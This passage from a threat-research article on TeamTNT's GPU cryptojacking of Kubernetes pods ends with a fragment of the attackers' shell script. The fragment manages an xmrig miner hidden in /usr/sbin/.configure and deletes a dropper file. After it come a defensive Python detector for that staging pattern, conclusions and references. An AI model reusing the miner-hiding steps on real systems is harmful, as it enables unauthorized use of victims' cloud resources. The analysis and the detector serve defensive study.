<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">]</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"WARNING: /usr/sbin/.configure/xmrig is not functional"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrig"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrig</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">else</span></span> 
<span style="color:#48484c"><span style="color:#48484c">echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"WARNING: /usr/sbin/.configure/xmrig was removed"</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">if</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">[</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#dd1144"><span style="color:#dd1144">"/usr/sbin/.configure/xmrigMiner"</span></span> <span style="color:#93a1a1"><span style="color:#93a1a1">];</span></span><span style="color:#1e347b"><span style="color:#1e347b">then</span></span><span style="color:#48484c"><span style="color:#48484c"> rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">usr</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">sbin</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/.</span></span><span style="color:#48484c"><span style="color:#48484c">configure</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">/</span></span><span style="color:#48484c"><span style="color:#48484c">xmrigMiner</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">;</span></span> <span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c">rm </span></span><span style="color:#93a1a1"><span style="color:#93a1a1">-</span></span><span style="color:#48484c"><span style="color:#48484c">f k32r</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">.</span></span><span style="color:#48484c"><span style="color:#48484c">sh </span></span><span style="color:#195f91"><span style="color:#195f91">2</span></span><span style="color:#93a1a1"><span style="color:#93a1a1">></span></span><span style="color:#dd1144"><span style="color:#dd1144">/dev/</span></span><span style="color:#1e347b"><span style="color:#1e347b">null</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">exit</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#1e347b"><span style="color:#1e347b">fi</span></span>
<span style="color:#48484c"><span style="color:#48484c">echo </span></span><span style="color:#dd1144"><span style="color:#dd1144">"[*] Miner /usr/sbin/.configure/xmrig is OK"</span></span>
<span style="color:#93a1a1"><span style="color:#93a1a1">}</span></span></span></span>

The details presented above show how TeamTNT harnesses NVIDIA GPU capabilities to run cryptojacking operations.
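A behavioural check for the staging sequence in the script above (extract into a dot-directory under a system binary path, set the execute bit, run the binary), given here as an added example that is not part of the original article. The `container|command line` record format and the sample events are constructed for illustration, and the match is generalised from `/usr/sbin/.configure` to any hidden directory directly under `/bin`, `/sbin`, `/usr/bin`, `/usr/sbin`, `/usr/local/bin` or `/usr/local/sbin`.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample: exec records in a made-up "container|command line" format.
SAMPLE_EVENTS = """\
pod-a|tar -xvf /usr/sbin/.configure/xmrig.tar.gz -C /usr/sbin/.configure/
pod-a|rm -f /usr/sbin/.configure/xmrig.tar.gz
pod-a|chmod +x /usr/sbin/.configure/xmrig
pod-a|/usr/sbin/.configure/xmrig -h
pod-b|tar -xvf /tmp/release.tar.gz -C /opt/app/
pod-b|chmod +x /opt/app/server
pod-b|/opt/app/server --port 8080
pod-c|chmod +x /usr/bin/.cache/worker
pod-c|/usr/bin/.cache/worker
"""

# A dot-directory directly under a system binary directory,
# e.g. /usr/sbin/.configure as used by the script on this page.
HIDDEN_BIN_DIR = re.compile(r"^(/(?:usr/(?:local/)?)?s?bin/\.[^/]+)/")


def hidden_dir(path):
    """Return the hidden system-bin directory containing path, or None."""
    m = HIDDEN_BIN_DIR.match(path)
    return m.group(1) if m else None


def adds_exec_bit(mode):
    """True for chmod modes that set an execute bit (+x, u+x, 755, ...)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return any(int(digit) & 1 for digit in mode[-3:])
    return "+" in mode and "x" in mode.split("+", 1)[1]


def detect(lines):
    """Return (container, binary, stages) for every exec from a hidden
    system-bin directory; stages lists the staging steps seen there before."""
    staged = defaultdict(set)  # (container, directory) -> {"extract", "chmod"}
    alerts = []
    for line in lines:
        container, _, cmdline = line.strip().partition("|")
        argv = shlex.split(cmdline)
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]
        if prog == "tar" and "-C" in argv[1:-1] and "x" in argv[1].lstrip("-"):
            dest = hidden_dir(argv[argv.index("-C") + 1].rstrip("/") + "/")
            if dest:
                staged[container, dest].add("extract")
        elif prog == "chmod" and len(argv) > 2 and adds_exec_bit(argv[1]):
            for target in argv[2:]:
                if hidden_dir(target):
                    staged[container, hidden_dir(target)].add("chmod")
        elif hidden_dir(argv[0]):
            stages = sorted(staged[container, hidden_dir(argv[0])])
            alerts.append((container, argv[0], stages))
    return alerts


if __name__ == "__main__":
    for container, binary, stages in detect(SAMPLE_EVENTS.splitlines()):
        print(f"{container}: exec of {binary}, staging seen: {stages or 'none'}")
```

Because the rule keys on the directory shape and the order of operations rather than on the name `xmrig`, it still fires if the binary is renamed.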

 

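Inference

Attackers are using the powerful GPU capabilities inherent to NVIDIA hardware to illegally mine cryptocurrency on compromised cloud infrastructure, passing the cloud costs on to the affected organizations. As noted earlier, TeamTNT did not exploit any vulnerability in the NVIDIA drivers in this attack; it used them in an unauthorized manner for cryptomining operations. The attackers profit from the compromised cloud infrastructure. This full cryptojacking attack involves covertly installing cryptomining code on compromised cloud infrastructure (pods running on nodes hosted in Kubernetes clusters) in order to mine cryptocurrency through unauthorized operations. Organizations face a significant risk from cryptojacking and should take measures to avoid such attacks.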

 

References

[1] Logan, M.; Fiser, D. TeamTNT Targets Kubernetes, Nearly 50,000 IPs Compromised in Worm-like Attack. Trend Micro. May 2021.

[2] Quist, N. TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations. Trend Micro. June 2021. (TeamTNT Operations Actively Enumerating Cloud Environments)

[3] Kubernetes Components. Kubernetes.

[4] Nodes. Kubernetes.

[5] Containers. Kubernetes.

[6] Pods. Kubernetes.

[7] Package "nvidia-headless-450-server" (focal 20.04). UbuntuUpdates.
